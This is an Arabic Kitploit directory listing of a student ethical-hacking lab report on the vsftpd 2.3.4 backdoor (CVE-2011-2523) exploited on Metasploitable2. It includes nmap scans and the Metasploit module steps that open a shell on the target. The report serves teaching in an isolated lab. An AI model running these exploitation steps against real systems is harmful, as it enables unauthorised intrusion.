Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ethical-hacking-CVE-2011-2523 — تقييم الاختراق الأخلاقي | اختبار عملي للثغرة في الباب الخلفي لـ vsftpd 2.3.4 (CVE-2011-2523) على Metasploitable2 باستخدام Kali Linux و Metasploit | Kitploit
أدوات/GitHubGitHub/chathura123git/ethical-hacking-cve-2011-2523
تحليل الثغرات الأمنيةالاستغلالCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubchathura123git/ethical-hacking-cve-2011-2523

ethical-hacking-CVE-2011-2523

تقييم الاختراق الأخلاقي | اختبار عملي للثغرة في الباب الخلفي لـ vsftpd 2.3.4 (CVE-2011-2523) على Metasploitable2 باستخدام Kali Linux و Metasploit

عرض المستودع
4منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

اختراق أخلاقي | التقييم 1

اختبار الثغرات العملي - CVE-2011-2523 (باب خلفي لـ vsftpd 2.3.4)

الوحدة: - اختراق أخلاقي الجامعة: جامعة لندن متروبوليتان البرنامج: بكالوريوس علوم (مع مرتبة الشرف) في الأمن السيبراني وعلوم الطب الشرعي

إخلاء مسؤولية قانوني

تم إجراء جميع الأنشطة في مختبر افتراضي معزول وخاضع للتحكم لأغراض تعليمية فقط. لم يتم استهداف أي أنظمة في العالم الحقيقي. يتوافق كل العمل مع قانون إساءة استخدام الحاسوب لعام 1990.

بيئة المختبر

  • نظام تشغيل المهاجم: كالي لينكس (المضيف)
  • عنوان IP المهاجم: 192.168.56.1 (vboxnet0)
  • الجهاز الهدف: Metasploitable2
  • عنوان IP الهدف: 192.168.56.103
  • مشغل الأجهزة الافتراضية: Oracle VirtualBox
  • وضع الشبكة: مضيف فقط (vboxnet0)

الثغرة المختارة - CVE-2011-2523

  • معرف الثغرة: CVE-2011-2523
  • البرنامج المتأثر: vsftpd 2.3.4
  • المنفذ المتأثر: 21/tcp (FTP)
  • درجة CVSS v3: 9.8 حرجة
  • ناقل الهجوم: شبكة
  • الامتيازات المطلوبة: لا شيء
  • المرجع: https://nvd.nist.gov/vuln/detail/CVE-2011-2523

نتائج فحص Nmap

المنفذ 21/tcp - vsftpd 2.3.4 (الهدف) المنفذ 22/tcp - OpenSSH 4.7p1 المنفذ 23/tcp - Linux telnetd المنفذ 80/tcp - Apache httpd 2.2.8 المنفذ 139/tcp - Samba smbd 3.X المنفذ 445/tcp - Samba smbd 3.X المنفذ 3306/tcp - MySQL 5.0.51a المنفذ 6667/tcp - UnrealIRCd

ملخص الاستغلال

الخطوة 1: nmap -sn 192.168.56.0/24 الخطوة 2: nmap -sV 192.168.56.103 الخطوة 3: msfconsole الخطوة 4: use exploit/unix/ftp/vsftpd_234_backdoor الخطوة 5: set RHOSTS 192.168.56.103 الخطوة 6: set LHOST 192.168.56.1 الخطوة 7: run الخطوة 8: id && whoami

المراجع

  • MITRE (2011) CVE-2011-2523. https://www.cve.org/CVERecord?id=CVE-2011-2523
  • NIST (2019) NVD CVE-2011-2523. https://nvd.nist.gov/vuln/detail/CVE-2011-2523
تنزيل الأداة